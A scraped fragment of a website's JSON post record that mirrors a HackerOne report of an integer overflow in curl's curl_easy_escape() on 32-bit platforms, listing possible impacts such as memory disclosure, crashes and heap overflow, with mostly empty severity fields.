sensitive data from the stack (passwords, API keys, session tokens)\\n- **Denial of Service**: Guaranteed crash when using large length values\\n- **Memory Corruption**: Potential heap buffer overflow with attacker-controlled input”,”published”:”2025-12-23T21:48:58″,”modified”:”2025-12-25T16:54:56″,”type”:”hackerone”,”title”:”curl: Integer Overflow in `curl_easy_escape()` may lead to heap buffer overflow and stack memory disclosure on 32-bit platforms”,”source”:””,”references”:””,”id”:”H1:3476928″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3476928″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-25T17:31:12″,”description”:”## Disclaimer\\nBoth the confirmation, and reporting of this vulnerability used AI assistance. Nonetheless, I manually reviewed all of the reported results, including its reproduction steps…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-32843","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n